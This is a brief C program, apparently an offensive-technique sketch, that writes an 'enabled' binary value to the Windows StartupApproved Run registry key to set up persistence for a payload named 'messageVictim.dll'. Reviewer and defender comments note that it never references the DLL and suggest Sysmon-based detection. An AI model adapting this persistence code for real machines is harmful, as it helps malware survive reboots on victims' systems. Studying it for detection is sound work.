/*
Windows persistence via StartUpApproved
*/
#include <windows.h>
#include <stdio.h>
/*
 * Entry point. Opens HKEY_CURRENT_USER\<path> (Explorer's "StartupApproved"
 * Run key) with KEY_WRITE and stores a single 12-byte REG_BINARY value in it.
 * argc/argv are unused. The return value is always 0, even when a registry
 * call fails: each status is only printed, never acted on.
 *
 * Defender note: this key is what Explorer's Startup-apps UI consults for the
 * enabled/disabled state of Run entries. A write to it from a process that is
 * not Explorer or the Settings app is a useful detection signal, e.g. registry
 * value-set telemetry (Sysmon event ID 13) scoped to this path.
 */
int main(int argc, char* argv[]) {
HKEY hkey = NULL;
// 12-byte blob whose first byte is 0x02. As far as I know this is the layout
// Explorer uses for an "enabled" entry (a leading 0x03 marks it disabled) --
// confirm against a value written by the Startup-apps UI itself.
BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartUpApproved\\Run";
// might need a function to get the location of messageVictim.dll
// NOTE(review): nothing in this file locates, loads or otherwise references
// messageVictim.dll. `evil` is passed to RegSetValueEx as the registry VALUE
// NAME, so the trailing comment on the next line does not describe its use.
const char* evil = "";// path to where messageVictim.dll is stored.
// Opened for writing only. On failure hkey stays NULL; res is printed but not
// checked, so the set/close calls below still run against a NULL handle and
// will themselves report failure.
LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
printf(res != ERROR_SUCCESS ? "failed to open registry key :(\n" : "successfully opened registry key:)\n");
// With an empty value name, RegSetValueEx writes the key's default value (per
// the API's lpValueName contract), storing all sizeof(data) bytes as REG_BINARY.
res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value:)\n");
// close registry key (return status is overwritten into res and then ignored)
res = RegCloseKey(hkey);
return 0;
}